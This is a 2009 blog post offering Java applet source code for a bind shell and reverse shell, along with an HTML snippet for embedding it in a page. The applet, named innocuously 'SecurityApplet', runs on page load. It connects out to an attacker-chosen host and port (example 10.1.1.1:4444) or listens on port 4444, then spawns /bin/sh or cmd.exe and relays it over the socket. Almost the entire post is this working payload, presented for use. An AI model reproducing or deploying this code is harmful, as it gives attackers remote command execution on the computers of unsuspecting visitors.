Friday, July 24, 2009

java applet bindshell / reverseshell

mostly not my code, inspiration from valsmith, hdm, etc...

/*
<html>
<head></head>
<body>
<applet archive="SecurityApplet.jar" code="SecurityApplet.class" width="1 height=">
<param name="rhost" value="10.1.1.1">
<param name="rport" value="4444">
</applet>
</body>
</html>
*/


import java.io.*;
import java.net.*;
import java.applet.Applet;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;

public class SecurityApplet extends Applet
{

public static String data = null;

public void init()
{
try
{

String rport = getParameter("RPORT");
String rhost = getParameter("RHOST");

Socket clientSocket = null;
ServerSocket serverSocket = null;
String os = System.getProperty( "os.name" );
String shell = "/bin/sh";
if( os.indexOf( "Windows" ) >= 0 )
shell = "cmd.exe";



try {

if (rhost == null && rport != null) {
serverSocket = new ServerSocket(Integer.parseInt(rport));
clientSocket = serverSocket.accept();
}
if ( rhost != null && rport != null ) {
clientSocket = new Socket(rhost,Integer.parseInt(rport));
} else {
rport = "4444";
serverSocket = new ServerSocket(Integer.parseInt(rport));
clientSocket = serverSocket.accept();
}


if (clientSocket != null) {

Process proc = Runtime.getRuntime().exec( shell );

PrintWriter out = new PrintWriter(clientSocket.getOutputStream(), true);
shellthread output = new shellthread(proc.getInputStream(), clientSocket.getOutputStream());
shellthread input = new shellthread(clientSocket.getInputStream(), proc.getOutputStream());

output.start();
input.start();
}
// serverSocket.close();
// clientSocket.close();
}
catch(NumberFormatException nfe)
{
System.out.println("nfe: " + nfe);
}
catch(IOException ioe)
{
System.out.println("ioe2: " + ioe);
}



}
catch( Exception e ) {}
}
//////////////////////////////////////////
private class shellthread extends Thread
{
InputStream inps;
OutputStream outs;
shellthread(InputStream inps, OutputStream outs)
{
this.inps = inps;
this.outs = outs;
}
public void run()
{
BufferedReader bufr = null;
BufferedWriter bufw = null;
try
{
bufr = new BufferedReader(new InputStreamReader(inps));
bufw = new BufferedWriter(new OutputStreamWriter(outs));
char buffer[] = new char[8192];
int lenRead;

while((lenRead = bufr.read(buffer, 0, buffer.length)) != -1)
{
bufw.write(buffer, 0, lenRead);
bufw.flush();
}
}
catch(Exception ioe)
{
System.out.println("ioe3: " + ioe);
}

try
{
if(bufr != null) bufr.close();
if(bufw != null) bufw.close();
}
catch (IOException ioe)
{
System.out.println("ioe4: " + ioe);
}
}
}
///////////////////////////////////



}
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)